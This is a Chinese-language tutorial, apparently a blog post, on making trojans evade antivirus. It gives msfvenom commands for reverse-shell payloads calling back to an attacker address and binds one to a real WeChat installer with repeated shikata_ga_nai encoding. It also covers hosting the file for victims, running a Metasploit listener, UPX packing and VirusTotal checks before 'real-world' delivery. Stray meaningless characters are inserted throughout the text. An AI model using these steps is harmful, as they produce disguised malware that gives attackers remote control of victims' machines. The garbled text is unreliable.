前言
免殺佛致,又叫免殺毒技術(shù),是反病毒凭需,反間諜的對立面问欠,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外粒蜈,還可以擴(kuò)增病毒木馬的功能顺献,改變病毒木馬的行為。免殺的基本特征是破壞特征枯怖,有可能是行為特征注整,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變嫁怀,一次免殺就能完成了设捐。免殺技術(shù)也并不是十惡不赦的,例如塘淑,在軟件保護(hù)所用的加密產(chǎn)品(比如殼)中萝招,有一些會被殺毒軟件認(rèn)為是木馬病毒;一些安全領(lǐng)域中的部分安全檢測產(chǎn)品存捺,也會被殺毒軟件誤殺槐沼,這時就需要免殺技術(shù)來應(yīng)對這些不穩(wěn)定因素。
1捌治、裸奔馬的嘗試
意為不做任何免殺處理的木馬
1岗钩、使用msf的msfvenom生成木馬文件,生成一個裸奔馬肖油,命名為 weixin.exe吧
命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe
2兼吓、部署一下kali上的apache服務(wù),令目標(biāo)機(jī)器能夠訪問下載我們生成的木馬
2.1森枪、kali中是自帶有apache的视搏,啟動apache服務(wù)
2.2、把生成的weixin.exe文件放在/var/www/html文件夾下
2.3县袱、在靶機(jī)下訪問192.168.111.132/weinxin.exe浑娜,已經(jīng)下載
2.4、發(fā)現(xiàn)被AV查殺
如果在實(shí)戰(zhàn)中式散,直接投遞裸奔馬比較容易引起對方運(yùn)維人員的警覺筋遭,這種方式也比較冒險,所以在投遞之前,要測試制作的木馬是否會引起相關(guān)AV的查殺漓滔,比如在在線多引擎病毒識別工具中去測試
2.5编饺、這里po一個在線殺毒查殺的網(wǎng)站,virustotal是一個提供免費(fèi)的可疑文件分析服務(wù)的網(wǎng)站次和,它與傳統(tǒng)殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件反肋。使用多種反病毒引擎對您所上傳的文件進(jìn)行檢測, 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。
2踏施、MSF編碼
在metasploit框架下免殺的方式之一是msf編碼器石蔗,功能是使用msf編碼器對我們制作的木馬進(jìn)行重新編碼,生成一個二進(jìn)制文件畅形,這個文件運(yùn)行后养距,msf編碼器會將原始程序解碼到內(nèi)存中并執(zhí)行。
1日熬、在kali終端輸入 msfvenom -l encoders棍厌,這可以列出所有可用的編碼格式
2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板竖席,這個模塊但是一些反病毒廠商關(guān)注的重點(diǎn)耘纱,為了更好的實(shí)現(xiàn)免殺,我們需要自主選擇一個待捆綁程序毕荐。在這里選擇是真正的微信安裝包束析。(也有對裸奔馬進(jìn)行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術(shù)多態(tài)憎亚,每次生成的攻擊載荷文件都不一樣员寇,有時生成的文件會被查殺,有時不會第美,所以結(jié)合以上思路蝶锋,生成一個捆綁木馬,并進(jìn)行shikata_ga_nai編碼)
把微信安裝包放在/root文件夾下
3什往、使用msfvenom生成一個Windows環(huán)境下的木馬扳缕,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時對木馬進(jìn)行x86/shikata_ga_nai進(jìn)行多次編碼的方式進(jìn)行免殺處理别威。
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe
參數(shù)說明:
-e /指定編碼方式對攻擊載荷進(jìn)行重新編碼
-x /指定木馬捆綁在哪個可執(zhí)行程序模板上
-i /指定對目標(biāo)進(jìn)行編碼的次數(shù)第献,多次編碼理論上有助于免殺的實(shí)現(xiàn)
-f /指定msf編碼器輸出程序的格式
-0 /指定處理完畢后的文件輸出路徑
4、把生成的文件放在kali中的apache服務(wù)對應(yīng)的文件夾下兔港,令攻擊機(jī)訪問
5、攻擊機(jī)下載后仔拟,在msf上創(chuàng)建監(jiān)聽
use exploit/multi/handler
set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp
show options ///查看一下哪些選項需要配置
set lhost 192.168.111.132 ///設(shè)置一下主機(jī)地址
set lport 9999 ///設(shè)置下主機(jī)端口衫樊,為木馬設(shè)定的端口
run
6、在目標(biāo)機(jī)器上點(diǎn)擊偽造的安裝包,沒有打開科侈,因為捆綁木馬并多次編碼后载佳,安裝包源文件已經(jīng)損壞,但是在攻擊機(jī)的臀栈,目標(biāo)機(jī)器已經(jīng)上線
3蔫慧、UPX加殼
upx打包器有兩種功能,一種叫做給程序加殼权薯,一種叫壓縮程序姑躲,在這里使用打包器的目的是改變后門程序的特征碼。
壓縮的時候:它首先可執(zhí)行文件中的可執(zhí)行數(shù)據(jù)解壓出來盟蚣,然后將解壓縮用的代碼附加在前面
運(yùn)行的時候:將原本的可執(zhí)行數(shù)據(jù)解壓出來黍析,然后再運(yùn)行解壓縮后的數(shù)據(jù)
1、在kali中內(nèi)置了upx打包器屎开,輸入upx可以看下參數(shù)介紹
2阐枣、簡單的命令就是直接upx file,對file文件進(jìn)行加殼處理奄抽,加殼后蔼两,因為經(jīng)過壓縮,文件大小會變小
3逞度、還是老樣子额划,把上面經(jīng)歷過編碼后,又加殼的weixin安裝包放在apache服務(wù)的文件夾下第晰,供目標(biāo)機(jī)器讀取下載(如上2.4)
4锁孟、在msf上可以創(chuàng)建正常的連接和監(jiān)聽,成功傳回
后言
免殺技術(shù)也被安全技術(shù)廠商盯上并開發(fā)相對應(yīng)的檢測技術(shù)茁瘦,所以免殺技術(shù)與殺軟技術(shù)是互相促進(jìn)發(fā)展的品抽,而且發(fā)展速度很快,有些現(xiàn)在可以測試成功的殺軟技術(shù)甜熔,過段時間就不能用了圆恤。免殺技術(shù)還需要狠下功夫去研究,接下來也會嘗試python腔稀,GO寫的免殺盆昙,也會在后續(xù)文章中敘述進(jìn)展!
